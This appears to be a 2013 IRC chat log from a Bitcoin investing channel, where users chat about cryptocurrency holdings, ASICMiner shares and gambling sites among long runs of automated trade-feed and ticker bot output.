is only going to slowly deteriorate Jul 10 02:39:19 how do you plan to cope? Jul 10 02:39:45 what do you mean going to? it is slowly deteriorating. Jul 10 02:39:45 cope with what? Jul 10 02:39:54 are your litecoin winnings enough to guarantee security through the great disjointing? Jul 10 02:39:57 heheh, you get it Jul 10 02:40:25 nobody's immortal Jul 10 02:40:36 ...yet... Jul 10 02:40:57 +1 Jul 10 02:41:02 so just give up? Jul 10 02:41:06 read books while the world burns? Jul 10 02:41:18 benkay: that was my plan Jul 10 02:41:25 it'd be nice to have a house to read books in :p Jul 10 02:41:31 and the guns to hold it Jul 10 02:41:34 and the food to survive on Jul 10 02:41:45 and maybe something warm and concave Jul 10 02:41:49 420 while the world burns ;) Jul 10 02:42:04 yeah, and work sucks, especially when 80% of what's out there is retail, so i want my money to work for me. Jul 10 02:42:32 what kind of money are you talking about? Jul 10 02:42:35 1e6? Jul 10 02:42:37 1e3? Jul 10 02:42:39 1e9? Jul 10 02:43:07 the kind that people use. Jul 10 02:43:20 1e6 sounds nice. But I'd prefer 1e9 Jul 10 02:43:21 so, $, euro, yen, BTC, etc Jul 10 02:43:58 quantity, son. Jul 10 02:44:01 not type. Jul 10 02:45:01 don't you think limiting pre plan to cash only is too narrow? Jul 10 02:45:07 *the plan Jul 10 02:45:30 power. Jul 10 02:45:40 in any distilled form. Jul 10 02:45:42 bullets Jul 10 02:45:44 guns Jul 10 02:46:00 useful things Jul 10 02:46:06 relationships. Jul 10 02:46:09 mdma? Jul 10 02:46:18 drugs, generally probably Jul 10 02:46:36 lol, you should move to rural colombia Jul 10 02:46:37 drug production capital equipment would be more valuable than just drugs imho Jul 10 02:47:16 hmm pill press it is Jul 10 02:47:34 jurov, not really, as a majority of people use fiat, not cryptos. Jul 10 02:47:34 that's packaging Jul 10 02:48:01 hate to say it but the dollar > btc.. for now, and quite a while. Jul 10 02:48:39 cosmo, are you sure? Jul 10 02:49:13 yeah, keep in mind i'm talking about market, not in how each respective system works. Jul 10 02:49:23 btc > $ in every way except adoption Jul 10 02:49:51 which is why i want to invest in it :) in a few years the concept will become popular. Jul 10 02:50:36 And you earn lots of money? Jul 10 02:50:54 or have Jul 10 02:50:56 By the way, don't let age discourage you, I know someone who is 22 and they own well over a million in Bitcoin assets Jul 10 02:52:10 how? did he came to irc and asked who is the loudest scammer around? Jul 10 02:52:27 =P Jul 10 02:52:28 Haha, not quite, you know Bitvegas? :P Jul 10 02:52:59 yes a bit Jul 10 02:53:21 The owner there ;) Jul 10 02:53:25 do people actually buy bitcoins to gamble or do they buy bitcoins and get suckered in to spending them on gambling? Jul 10 02:53:41 Bitta both I'd say Jul 10 02:53:55 is anyone ever suckered into gambling? Jul 10 02:54:05 Maybe even the third option: They chicken out of buying drugs and see no other way to spend them? Jul 10 02:54:13 https://en.bitcoin.it/wiki/BitVegas < wow Jul 10 02:54:15 BitVegas - Bitcoin Jul 10 02:54:33 Yea! I am on it right now :D Jul 10 02:55:15 chicken out from buying drugs?? what is wrong with the world :P Jul 10 02:55:25 Haha :P Jul 10 02:55:25 cosmo yea we been sayin that since 2009 :D Jul 10 02:55:33 i played some online poker, but didn't break even Jul 10 02:55:47 sealswithclubs? Jul 10 02:55:58 i felt mircea_popescu's presence Jul 10 02:56:11 pokerstars, full tilt.. not bitcoin related Jul 10 02:56:17 I've thought about playing some poker but I imagine it's a steep slope... Jul 10 02:56:28 lol Jul 10 02:56:38 aren't those sites illegal in america? Jul 10 02:56:39 matthew_boyd, i don't earn lots of money :c i don't want to earn lots of money, i just want to secure a future where i don't have to worry about earning it to get by. Jul 10 02:56:49 in america, maybe... Jul 10 02:57:09 cosmo: of course, was just trying to tell you not to let age be an issue. :) Jul 10 02:57:17 best feature of the nintendo ds Jul 10 02:57:24 portable house hold netflix player Jul 10 02:57:26 OOOOooooO Jul 10 02:57:29 oh it's not.. i've met enough stupid adults to figure that out :s Jul 10 02:57:39 nintendo 3ds* Jul 10 02:58:17 http://stream1.gifsoup.com/view/501524/holy-spirit-o.gif < When mircea_popescu's spirit is felt Jul 10 02:58:32 cosmo, i'm curious now.. how much money do you want to invest? Jul 10 02:59:00 only on womenz. Jul 10 02:59:08 living only by some investments and without worries seems.. not that easy to me Jul 10 02:59:11 hahahahha Jul 10 02:59:31 cosmo, about 3 months ago I invest in BTC and ASICM - I am young (a little older then you) Jul 10 02:59:34 probably around $8k, i got a bunch of litecoin when they were pennies. Jul 10 03:00:13 herp Jul 10 03:00:21 you still have some work ahead of you Jul 10 03:00:44 while the rich get richer :\ Jul 10 03:00:51 cosmo, hold onto the litecoins, if Gox introduces them you will be loaded ;) Jul 10 03:01:02 maybe Jul 10 03:01:43 i'm actually holding onto DGC at the moment :p Jul 10 03:01:55 but yeah, i still held a bunch. it's obvious to diversify. Jul 10 03:03:34 invest in cocaine :) Jul 10 03:03:36 ;;ticker Jul 10 03:03:37 MtGox BTCUSD ticker | Best bid: 76.24001, Best ask: 76.70000, Bid-ask spread: 0.45999, Last trade: 76.74000, 24 hour volume: 32217.68218656, 24 hour low: 72.51000, 24 hour high: 78.30000, 24 hour vwap: 75.64566 Jul 10 03:03:57 after coins, weed was my greatest investment :) straightedge 4 lyfe Jul 10 03:04:06 wow, that BTC volume seems a lot larger then the average... Jul 10 03:06:32 has actual trade volume sky rocketed since the price has dropped..?? Jul 10 03:06:51 ertyctnseldom, i don't have a problem living off the grid :) it's just, can't be homeless forever, old age gets to you Jul 10 03:09:15 i think it's not enough to attract bigger companies, but you should contact them anyway and give it a try. you're already buying/holding bitcoin.. if you only hold and don't use them for trading btc/usd, maybe you should look into bitcoin stocks. it adds risk, but strengthens the bitcoin business. the more coins are being "used", the better. i really like to see more of this to emerge. with asicminer, there is almost a c Jul 10 03:09:50 people buy their shares with coins and their products are bitcoin related. some nice profits can be made, too, but it's risky, as you said, and sadly, almost every stock is related to mining.. Jul 10 03:10:11 or gambling ;) Jul 10 03:10:27 what's asicminer at now? don't know the commands for this channel.. Jul 10 03:12:02 over 9000 Jul 10 03:12:16 !ticker btctco asicminer-pt Jul 10 03:12:20 hmm.. Jul 10 03:12:23 i don't know either Jul 10 03:12:39 but am fluctuates somewhere between 4.1-4.3 right now Jul 10 03:13:26 yeah, sitting pretty on 4.2BTC per share Jul 10 03:13:45 i remember it was around 2 a month or two ago, and lurking in here folks were talking about it being risky at that Jul 10 03:14:07 folks being prominent people like mircea Jul 10 03:14:57 so far, ASICM has not lied :) Jul 10 03:15:50 man, i'm clueless Jul 10 03:15:54 it's always like that after a rise and i won't deny the probability of crash goes up as well, but AM seems to hold a new reached level.. at least till now Jul 10 03:15:57 ;;ticker btctco asicminer-pt Jul 10 03:15:57 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market mtgox|btce|bitstamp]) -- Return pretty-printed ticker. Default market is Mtgox. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make (1 more message) Jul 10 03:16:58 o/ Vbs! Jul 10 03:17:30 ;;bc,stats Jul 10 03:17:31 Current Blocks: 245757 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 194 blocks | Next Difficulty In About: 1 day, 1 hour, 1 minute, and 56 seconds | Next Difficulty Estimate: 25934540.643 | Estimated Percent Change: 21.55679 Jul 10 03:17:36 ;) Jul 10 03:18:07 that's quite a jump indeed Jul 10 03:32:29 [BTCTC] [DMS.SELLING] 20 @ 0.031199 = 0.624 BTC [+] Jul 10 03:32:29 [BTCTC] [DMS.SELLING] 80 @ 0.0312 = 2.496 BTC [+] Jul 10 03:32:30 [HAVELOCK] [ASICM] 2 @ 0.042249 = 0.0845 BTC [+] Jul 10 03:32:31 [MPEX] [S.MPOE] 5594 @ 0.00081301 = 4.548 BTC [-] Jul 10 03:32:32 [MPEX] [S.MPOE] 10444 @ 0.00081196 = 8.4801 BTC [-] Jul 10 03:32:33 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Jul 10 03:32:34 [BTCTC] [BASIC-MINING] 2 @ 0.274999 = 0.55 BTC [-] Jul 10 03:32:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 10 03:32:36 [BTCTC] [DMS.MINING] 59 @ 0.0181 = 1.0679 BTC [-] Jul 10 03:32:37 [BTCTC] [DMS.PURCHASE] 50 @ 0.048913 = 2.4457 BTC [+] Jul 10 03:32:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004598 BTC [+] Jul 10 03:32:38 [BTCTC] [DMS.MINING] 10 @ 0.0181 = 0.181 BTC [-] Jul 10 03:32:39 [BTCTC] [DMS.MINING] 10 @ 0.018082 = 0.1808 BTC [-] Jul 10 03:32:40 [BTCTC] [DMS.PURCHASE] 30 @ 0.048913 = 1.4674 BTC [+] Jul 10 03:32:41 [BTCTC] [BASIC-MINING] 1 @ 0.265 BTC [-] Jul 10 03:32:42 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [-] Jul 10 03:32:43 [BTCTC] [DMS.SELLING] 8 @ 0.031199 = 0.2496 BTC [-] Jul 10 03:32:44 [BTCTC] [AMC-PT] 755 @ 0.002499 = 1.8867 BTC [-] Jul 10 03:32:45 [BTCTC] [AMC-PT] 8 @ 0.002499 = 0.02 BTC [-] Jul 10 03:32:46 [BTCTC] [AMC-PT] 965 @ 0.002499 = 2.4115 BTC [-] Jul 10 03:32:47 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 10 03:32:48 [HAVELOCK] [VTX] 3 @ 0.9 = 2.7 BTC [-] Jul 10 03:32:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 10 03:32:50 [BTCTC] [DMS.MINING] 1 @ 0.0187 BTC [+] Jul 10 03:32:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jul 10 03:32:52 [BTCTC] [TAT.ASICMINER] 8 @ 0.043 = 0.344 BTC [+] Jul 10 03:32:52 [BTCTC] [TAT.ASICMINER] 11 @ 0.043 = 0.473 BTC [+] Jul 10 03:32:53 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [-] Jul 10 03:32:54 [BTCTC] [DMS.MINING] 9 @ 0.01879 = 0.1691 BTC [+] Jul 10 03:32:56 [BTCTC] [DMS.MINING] 7 @ 0.0187 = 0.1309 BTC [-] Jul 10 03:32:56 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 10 03:32:57 [BTCTC] [AMC-PT] 52 @ 0.0025 = 0.13 BTC [+] Jul 10 03:34:50 [BTCTC] [ASICMINER-PT] 1 @ 4.241001 BTC [-] Jul 10 03:37:11 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.004598 = 0.1241 BTC [+] Jul 10 03:37:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.041971 = 2.0986 BTC [-] Jul 10 03:38:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.041971 BTC [-] Jul 10 03:38:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.04197 = 0.1679 BTC [-] Jul 10 03:39:29 [BTCTC] [ASICMINER-PT] 33 @ 4.3 = 141.9 BTC [+] Jul 10 03:39:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.04111 = 0.8222 BTC [-] Jul 10 03:39:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.042224 BTC [+] Jul 10 03:39:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042224 BTC [+] Jul 10 03:40:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.042224 BTC [+] Jul 10 03:40:29 [BTCTC] [TAT.ASICMINER] 17 @ 0.042224 = 0.7178 BTC [+] Jul 10 03:40:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.0411 = 0.0822 BTC [-] Jul 10 03:41:15 [BTCTC] [TAT.ASICMINER] 17 @ 0.0411 = 0.6987 BTC [-] Jul 10 03:42:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.041001 = 0.082 BTC [-] Jul 10 03:42:59 [BTCTC] [TAT.ASICMINER] 21 @ 0.041001 = 0.861 BTC [-] Jul 10 03:43:11 [BTCTC] [TAT.ASICMINER] 20 @ 0.041001 = 0.82 BTC [-] Jul 10 03:44:44 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jul 10 03:45:54 [BTCTC] [AMC-PT] 9035 @ 0.002499 = 22.5785 BTC [-] Jul 10 03:47:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:47:44 [BTCTC] [BTC-BOND] 2 @ 0.009998 = 0.02 BTC [+] Jul 10 03:49:20 [BTCTC] [S.MPOE-PT] 26 @ 0.000897 = 0.0233 BTC [+] Jul 10 03:49:22 [BTCTC] [S.MPOE-PT] 50 @ 0.000896 = 0.0448 BTC [-] Jul 10 03:51:26 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 10 03:51:36 [BTCTC] [AMC-PT] 27 @ 0.002499 = 0.0675 BTC [-] Jul 10 03:51:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.04222 = 0.2111 BTC [-] Jul 10 03:51:54 [BTCTC] [TAT.ASICMINER] 45 @ 0.04222 = 1.8999 BTC [-] Jul 10 03:53:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:53:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:53:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:53:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:53:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:53:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:53:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 03:58:44 [BTCTC] [DMS.SELLING] 6 @ 0.031199 = 0.1872 BTC [-] Jul 10 03:59:43 [BTCTC] [S.MPOE-PT] 50 @ 0.000989 = 0.0495 BTC [+] Jul 10 04:00:20 [BTCTC] [TAT.ASICMINER] 40 @ 0.04222 = 1.6888 BTC [-] Jul 10 04:02:40 [MPEX] [S.MPOE] 1700 @ 0.00080841 = 1.3743 BTC [-] Jul 10 04:05:24 [BTCTC] [BITVPS] 35 @ 0.002197 = 0.0769 BTC [+] Jul 10 04:06:36 ertyctnseldom, that was a good read, refreshing Jul 10 04:07:15 [BTCTC] [AMC-PT] 50 @ 0.002211 = 0.1106 BTC [-] Jul 10 04:10:20 [BTCTC] [AMC-PT] 3010 @ 0.002499 = 7.522 BTC [+] Jul 10 04:11:08 ^ asicmimer ^ Jul 10 04:13:13 surely no one is that... uneducated... about what they're spending money on Jul 10 04:15:03 Skitchen... lol Jul 10 04:22:39 [BTCTC] [BASIC-MINING] 7 @ 0.273899 = 1.9173 BTC [+] Jul 10 04:22:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.042 = 0.084 BTC [-] Jul 10 04:24:18 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 10 04:30:29 [BTCTC] [DMS.MINING] 54 @ 0.01879 = 1.0147 BTC [+] Jul 10 04:32:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.041999 = 0.084 BTC [-] Jul 10 04:32:21 [BTCTC] [B.YABMC] 1 @ 0.004601 BTC [-] Jul 10 04:38:45 [BTCTC] [BTC-BOND] 40 @ 0.009903 = 0.3961 BTC [-] Jul 10 04:38:47 [BTCTC] [BTC-BOND] 965 @ 0.009902 = 9.5554 BTC [-] Jul 10 04:41:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.041999 BTC [-] Jul 10 04:42:11 [MPEX] [S.MPOE] 3900 @ 0.00080841 = 3.1528 BTC [-] Jul 10 04:43:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.041022 = 0.082 BTC [-] Jul 10 04:44:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.041022 BTC [-] Jul 10 04:44:03 [BTCTC] [TAT.ASICMINER] 18 @ 0.04102 = 0.7384 BTC [-] Jul 10 04:45:47 [BTCTC] [ASICMINER-PT] 1 @ 4.349999 BTC [+] Jul 10 04:46:18 [BTCTC] [AMC-PT] 1435 @ 0.002499 = 3.5861 BTC [-] Jul 10 04:52:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.041272 BTC [+] Jul 10 04:55:17 [BTCTC] [BTC-BOND] 8 @ 0.009902 = 0.0792 BTC [-] Jul 10 04:56:27 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [+] Jul 10 05:01:27 [BTCTC] [AMC-PT] 27 @ 0.0025 = 0.0675 BTC [+] Jul 10 05:01:40 [BTCTC] [TAT.ASICMINER] 18 @ 0.041999 = 0.756 BTC [+] Jul 10 05:01:42 [BTCTC] [TAT.ASICMINER] 32 @ 0.042 = 1.344 BTC [+] Jul 10 05:01:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.042219 = 0.8444 BTC [+] Jul 10 05:01:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:01:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:01:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:01:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:01:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:01:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:02:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:02:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.042221 BTC [+] Jul 10 05:02:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.042225 BTC [+] Jul 10 05:02:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.042226 BTC [+] Jul 10 05:02:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.043 = 0.86 BTC [+] Jul 10 05:03:56 [MPEX] [S.MPOE] 4962 @ 0.00080964 = 4.0174 BTC [+] Jul 10 05:03:57 [MPEX] [S.MPOE] 2738 @ 0.00081039 = 2.2188 BTC [+] Jul 10 05:04:12 [BTCTC] [AMC-PT] 1 @ 0.002215 BTC [-] Jul 10 05:05:40 [BTCTC] [AMC-PT] 2 @ 0.002215 = 0.0044 BTC [-] Jul 10 05:09:54 [BTCTC] [ASICMINER-PT] 1 @ 4.379 BTC [+] Jul 10 05:13:01 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 10 05:14:29 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [+] Jul 10 05:14:44 [BTCTC] [DMS.PURCHASE] 33 @ 0.048913 = 1.6141 BTC [+] Jul 10 05:21:07 [BTCTC] [BASIC-MINING] 3 @ 0.269999 = 0.81 BTC [-] Jul 10 05:28:44 [MPEX] [S.MPOE] 4800 @ 0.00080962 = 3.8862 BTC [-] Jul 10 05:35:21 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 10 05:35:22 [BTCTC] [ASICMINER-PT] 4 @ 4.4 = 17.6 BTC [+] Jul 10 05:35:24 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 10 05:35:26 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [+] Jul 10 05:35:27 [BTCTC] [ASICMINER-PT] 1 @ 4.43 BTC [+] Jul 10 05:35:29 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [+] Jul 10 05:35:30 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 10 05:35:32 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 10 05:35:34 [BTCTC] [ASICMINER-PT] 1 @ 4.46 BTC [+] Jul 10 05:35:35 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [+] Jul 10 05:35:37 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [+] Jul 10 05:35:39 [BTCTC] [ASICMINER-PT] 2 @ 4.488995 = 8.978 BTC [+] Jul 10 05:35:41 [BTCTC] [ASICMINER-PT] 1 @ 4.489 BTC [+] Jul 10 05:35:42 [BTCTC] [ASICMINER-PT] 1 @ 4.49 BTC [+] Jul 10 05:35:44 [BTCTC] [ASICMINER-PT] 10 @ 4.49 = 44.9 BTC [+] Jul 10 05:35:46 [BTCTC] [ASICMINER-PT] 1 @ 4.4999 BTC [+] Jul 10 05:35:47 [BTCTC] [ASICMINER-PT] 9 @ 4.5 = 40.5 BTC [+] Jul 10 05:37:09 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [+] Jul 10 05:37:11 [BTCTC] [ASICMINER-PT] 1 @ 4.52 BTC [+] Jul 10 05:37:13 [BTCTC] [ASICMINER-PT] 18 @ 4.52 = 81.36 BTC [+] Jul 10 05:37:15 [BTCTC] [ASICMINER-PT] 22 @ 4.52999 = 99.6598 BTC [+] Jul 10 05:37:18 [BTCTC] [ASICMINER-PT] 30 @ 4.53 = 135.9 BTC [+] Jul 10 05:37:20 [BTCTC] [ASICMINER-PT] 28 @ 4.54 = 127.12 BTC [+] Jul 10 05:40:09 [HAVELOCK] [ASICM] 4 @ 0.042 = 0.168 BTC [-] Jul 10 05:42:58 [BTCTC] [COGNITIVE] 1 @ 0.22 BTC [-] Jul 10 05:45:43 [BTCTC] [BASIC-MINING] 4 @ 0.269999 = 1.08 BTC [-] Jul 10 05:49:45 [BTCTC] [DMS.MINING] 1 @ 0.0187 BTC [-] Jul 10 05:51:07 ASICM - any new news from the cat of fried? Jul 10 05:55:03 none since last night's Jul 10 05:57:22 [MPEX] [S.MPOE] 3300 @ 0.00080841 = 2.6678 BTC [-] Jul 10 05:58:25 current price rise is people getting in pre-dividend again..? Jul 10 05:58:54 *speculating* Jul 10 05:59:35 [HAVELOCK] [ASICM] 2 @ 0.04100001 = 0.082 BTC [-] Jul 10 05:59:37 [HAVELOCK] [ASICM] 48 @ 0.041 = 1.968 BTC [-] Jul 10 06:00:23 [BTCTC] [ASICMINER-PT] 17 @ 4.5 = 76.5 BTC [-] Jul 10 06:05:14 [BTCTC] [BASIC-MINING] 1 @ 0.269999 BTC [-] Jul 10 06:05:57 [BTCTC] [TAT.ASICMINER] 12 @ 0.04299 = 0.5159 BTC [-] Jul 10 06:07:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [+] Jul 10 06:11:33 AMC gonna advertise now... https://bitcointalk.org/index.php?topic=253076.msg2695198#msg2695198 Jul 10 06:14:06 [HAVELOCK] [ASICM] 3 @ 0.0421 = 0.1263 BTC [+] Jul 10 06:14:51 [HAVELOCK] [ASICM] 102 @ 0.0421 = 4.2942 BTC [+] Jul 10 06:15:12 [HAVELOCK] [ASICM] 36 @ 0.041 = 1.476 BTC [-] Jul 10 06:15:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.048913 BTC [+] Jul 10 06:15:19 Go home AMC, you're drunk Jul 10 06:16:47 [BTCTC] [COGNITIVE] 4 @ 0.22 = 0.88 BTC [-] Jul 10 06:25:08 [HAVELOCK] [HIM] 13 @ 0.300299 = 3.9039 BTC [+] Jul 10 06:34:14 [BTCTC] [DMS.MINING] 22 @ 0.018082 = 0.3978 BTC [-] Jul 10 06:37:20 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 10 06:39:58 [BTCTC] [ASICMINER-PT] 2 @ 4.425001 = 8.85 BTC [-] Jul 10 06:41:02 [BTCTC] [DMS.MINING] 20 @ 0.0185 = 0.37 BTC [+] Jul 10 06:41:14 [BTCTC] [AMC-PT] 3500 @ 0.0025 = 8.75 BTC [+] Jul 10 06:42:23 [BTCTC] [BTC-BOND] 12 @ 0.009998 = 0.12 BTC [+] Jul 10 06:43:18 [BTCTC] [AMC-PT] 22 @ 0.0025 = 0.055 BTC [+] Jul 10 06:43:52 [BTCTC] [BITVPS] 250 @ 0.002001 = 0.5003 BTC [-] Jul 10 06:43:54 [BTCTC] [BITVPS] 49 @ 0.002 = 0.098 BTC [-] Jul 10 06:43:55 [BTCTC] [BITVPS] 332 @ 0.00192 = 0.6374 BTC [-] Jul 10 06:43:56 [BTCTC] [BITVPS] 1 @ 0.001901 BTC [-] Jul 10 06:44:33 [BTCTC] [BMF] 1 @ 0.033999 BTC [-] Jul 10 06:50:24 [BTCTC] [ASICMINER-PT] 2 @ 4.425001 = 8.85 BTC [-] Jul 10 06:50:26 [BTCTC] [ASICMINER-PT] 1 @ 4.425 BTC [-] Jul 10 06:50:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [+] Jul 10 06:51:28 [BTCTC] [ASICMINER-PT] 4 @ 4.425 = 17.7 BTC [-] Jul 10 06:51:30 [BTCTC] [ASICMINER-PT] 1 @ 4.418 BTC [-] Jul 10 06:51:32 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [-] Jul 10 06:51:34 [BTCTC] [ASICMINER-PT] 5 @ 4.375 = 21.875 BTC [-] Jul 10 06:51:36 [BTCTC] [ASICMINER-PT] 4 @ 4.325 = 17.3 BTC [-] Jul 10 06:56:41 [BTCTC] [AMC-PT] 157 @ 0.0025 = 0.3925 BTC [+] Jul 10 07:02:56 http://m.phys.org/news/2013-07-5d-optical-memory-glass-evidence.html Jul 10 07:02:58 Phys.Org Mobile: 5D optical memory in glass could record the last evidence of civilization Jul 10 07:03:26 [HAVELOCK] [ASICM] 2 @ 0.04198 = 0.084 BTC [+] Jul 10 07:26:00 [BTCTC] [BFMINES] 8 @ 0.004 = 0.032 BTC [+] Jul 10 07:31:57 [BTCTC] [TAT.ASICMINER] 9 @ 0.0435 = 0.3915 BTC [+] Jul 10 07:44:47 [MPEX] [S.MPOE] 7100 @ 0.00080907 = 5.7444 BTC [+] Jul 10 07:47:20 [BTCTC] [TAT.ASICMINER] 20 @ 0.0435 = 0.87 BTC [+] Jul 10 07:50:19 [HAVELOCK] [HIM] 17 @ 0.300299 = 5.1051 BTC [+] Jul 10 07:50:24 [BTCTC] [BASIC-MINING] 2 @ 0.269999 = 0.54 BTC [-] Jul 10 07:50:26 [BTCTC] [BASIC-MINING] 4 @ 0.27 = 1.08 BTC [+] Jul 10 07:50:27 [BTCTC] [BASIC-MINING] 7 @ 0.28 = 1.96 BTC [+] Jul 10 07:51:39 [HAVELOCK] [HIM] 5 @ 0.3 = 1.5 BTC [-] Jul 10 07:52:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0435 BTC [+] Jul 10 07:52:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0439 BTC [+] Jul 10 07:52:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.043001 BTC [-] Jul 10 07:57:02 [BTCTC] [DMS.MINING] 42 @ 0.0186 = 0.7812 BTC [+] Jul 10 08:04:59 [BTCTC] [DMS.MINING] 1 @ 0.018749 BTC [+] Jul 10 08:07:44 [BTCTC] [TAT.ASICMINER] 29 @ 0.043899 = 1.2731 BTC [+] Jul 10 08:12:50 ThickAsThieves pretty cool shit! Jul 10 08:15:00 [BTCTC] [DMS.SELLING] 25 @ 0.030997 = 0.7749 BTC [-] Jul 10 08:17:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.043895 = 0.0878 BTC [-] Jul 10 08:20:30 [BTCTC] [DMS.SELLING] 47 @ 0.030998 = 1.4569 BTC [+] Jul 10 08:25:13 whut :O Jul 10 08:25:14 [BTCTC] [DMS.PURCHASE] 53 @ 0.048913 = 2.5924 BTC [+] Jul 10 08:25:44 imagine the pr0ns you can have with 360TB per disk **** BEGIN LOGGING AT Wed Jul 10 14:48:14 2013 Jul 10 14:53:46 [MPEX] [S.MPOE] 5429 @ 0.00081417 = 4.4201 BTC [+] Jul 10 14:56:17 [BTCTC] [ASICMINER-PT] 2 @ 4.448887 = 8.8978 BTC [-] Jul 10 14:58:11 [07:22] Hi everyone, I am in the process of launching a Bitcoin startup here in Cyprus, that will allow for mass adoption. I am currently investigating the various routes to funding the start up. Its going to require around €1.5m dependant upon the clarification provided by the Central Bank on regulations we must adhere too. Would €1.5m be achievable through the Jul 10 14:58:11 Bitfunder platform? Jul 10 14:58:41 I have a PDF of their sorta business plan if anyone is interested... Jul 10 15:00:30 [BTCTC] [TAT.ASICMINER] 48 @ 0.0441 = 2.1168 BTC [+] Jul 10 15:01:09 [HAVELOCK] [ASICM] 15 @ 0.043629 = 0.6544 BTC [-] Jul 10 15:02:30 [BTCTC] [AMC-PT] 9 @ 0.00249 = 0.0224 BTC [+] Jul 10 15:02:31 [BTCTC] [AMC-PT] 83 @ 0.00249 = 0.2067 BTC [+] Jul 10 15:02:33 [BTCTC] [AMC-PT] 8 @ 0.00249 = 0.0199 BTC [+] Jul 10 15:04:04 Anyone got predictions on divz? Jul 10 15:04:11 Maybe like .02 at most? Jul 10 15:11:26 will it focus on Alpaca socks? Jul 10 15:11:43 and King Mircea? Jul 10 15:11:50 [BTCTC] [AMC-PT] 2 @ 0.002494 = 0.005 BTC [+] Jul 10 15:12:11 and of course, Jul 10 15:12:16 corporate espionage Jul 10 15:12:23 I have a feeling divs are going to be .03 Jul 10 15:12:25 being a victim of one's own success Jul 10 15:12:32 etc Jul 10 15:13:51 I have a feeling AM will hit 5btc again within 7 days Jul 10 15:14:07 good feeling! Jul 10 15:15:36 [BTCTC] [DMS.MINING] 21 @ 0.018748 = 0.3937 BTC [+] Jul 10 15:15:38 [BTCTC] [DMS.MINING] 8 @ 0.018749 = 0.15 BTC [+] Jul 10 